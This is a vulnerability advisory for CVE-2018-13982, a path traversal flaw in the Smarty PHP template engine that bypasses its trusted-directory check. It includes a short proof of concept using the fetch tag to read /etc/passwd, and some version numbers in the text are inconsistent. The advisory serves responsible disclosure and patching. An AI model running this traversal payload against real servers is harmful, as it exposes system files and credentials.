Trusted-Directory Bypass via Path Traversal

Smarty Trusted-Directory Bypass via Path Traversal\nVulnerability Overview\nSmarty 3.1.32 or below is prone to a path traversal vulnerability due\nto insufficient sanitization of code in Smarty templates. This allows\nattackers controlling the Smarty template to bypass the trusted\ndirectory security restriction and read arbitrary files.\n\nIdentifier : SBA-ADV-20180420-01\nType of Vulnerability : Path Traversal\nSoftware/Product Name : Smarty\nVendor : Smarty\nAffected Versions : 3.1.32 and probably prior\nFixed in Version : 3.1.33\nCVE ID : CVE-2018-13982\nCVSSv3 Vector : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\nCVSSv3 Base Score : 8.6 (High)\n\nVendor Description\n\nSmarty is a template engine for PHP, facilitating the separation of\npresentation (HTML/CSS) from application logic. This implies that PHP\ncode is application logic, and is separated from the presentation.\n\nSource: https://www.smarty.net/about_smarty\nImpact\nAn attacker controlling the executed template code can read arbitrary\nfiles accessible by the webserver by exploiting the vulnerability\ndocumented in this advisory. Sensitive data such as database credentials\nmight get exposed through this attack.\nWe recommend upgrading to version 3.1.33 or newer.\nVulnerability Description\nSmarty allows restricting which paths are accessible paths during\ntemplate evaluation. This feature is implemented in the\nSmarty_Security class and is enabled via the method enableSecurity.\nHowever, the trusted directory check implemented in the method\nisTrustedResourceDir of the Smarty_Security class is vulnerable to\npath traversal.\nThe method isTrustedResourceDir first builds a list of allowed\ndirectories in $filepath and then relies on the _checkDir method\nto check if the requested resource dir is trusted. In version 0.3.31\nneither isTrustedResourceDir nor _checkDir avoid path traversal:\npublic function isTrustedResourceDir($filepath, $isConfig = null)\n{\n […]\n $this->_resource_dir = $this->_checkDir($filepath, $this->_resource_dir);\n return true;\n}\n\nprivate function _checkDir($filepath, $dirs)\n{\n $directory = dirname($filepath) . DIRECTORY_SEPARATOR;\n $_directory = array();\n while (true) {\n // remember the directory to add it to _resource_dir in case we’re successful\n $_directory[ $directory ] = true;\n // test if the directory is trusted\n if (isset($dirs[ $directory ])) {\n // merge sub directories of current $directory into _resource_dir to speed up subsequent lookup\n $dirs = array_merge($dirs, $_directory);\n return $dirs;\n }\n // abort if we’ve reached root\n if (!preg_match(‘#[\\\\\/][^\\\\\/]+[\\\\\/]$#’, $directory)) {\n break;\n }\n // bubble up one level\n $directory = preg_replace(‘#[\\\\\/][^\\\\\/]+[\\\\\/]$#’, DIRECTORY_SEPARATOR, $directory);\n }\n // give up\n throw new SmartyException("directory ‘{$filepath}’ not allowed by security setting");\n}\nIn version 0.3.32 _checkDir calls _realpath before checking if the\nrequested resource is trusted. However, the custom realpath method is\nbroken and allows path traversal at least on Unix systems.\nFor example, the fetch tag uses the isTrustedResourceDir method to\ncheck if a user-specified path is allowed to read.\nProof-of-Concept\nAn attacker can exploit this vulnerability by using the fetch tag:\n{fetch file="/var/www/templates/…/…/…/…/…/etc/passwd"}\nFull example:\nenableSecurity();\n// Fails\n//$smarty->display(‘eval:{fetch file="/etc/passwd"}’);\n// Works\n$smarty->display(‘eval:{fetch file="’.addslashes(getcwd()).‘/templates/…/…/…/…/…/etc/passwd"}’);\nTimeline\n\n2018-04-20: identification of vulnerability in version 3.1.31\n2018-04-23: initial vendor contact\n2018-04-23: disclosed vulnerability to vendor\n2018-04-24: vendor acknowledged vulnerability and released version 3.1.32\n2018-04-25: notified vendor about incomplete fix\n2018-04-26: vendor fixed vulnerability\n2018-07-10: request CVE from MITRE\n2018-07-11: MITRE assigned CVE-2018-13982\n2018-09-12: vendor released fix in version 3.1.33\n2018-09-17: public disclosure\n\nReferences\n\nChangelog: https://github.com/smarty-php/smarty/commit/bcedfd6b58bed4a7366336979ebaa5a240581531\nPatches:\n\nhttps://github.com/smarty-php/smarty/commit/8d21f38dc35c4cd6b31c2f23fc9b8e5adbc56dfe\nhttps://github.com/smarty-php/smarty/commit/f9ca3c63d1250bb56b2bda609dcc9dd81f0065f8\nhttps://github.com/smarty-php/smarty/commit/2e081a51b1effddb23f87952959139ac62654d50\nhttps://github.com/smarty-php/smarty/commit/c9dbe1d08c081912d02bd851d1d1b6388f6133d1\n\n\n\nCredits\n\nDavid Gnedt (SBA Research)\nThomas Konrad (SBA Research)\n\n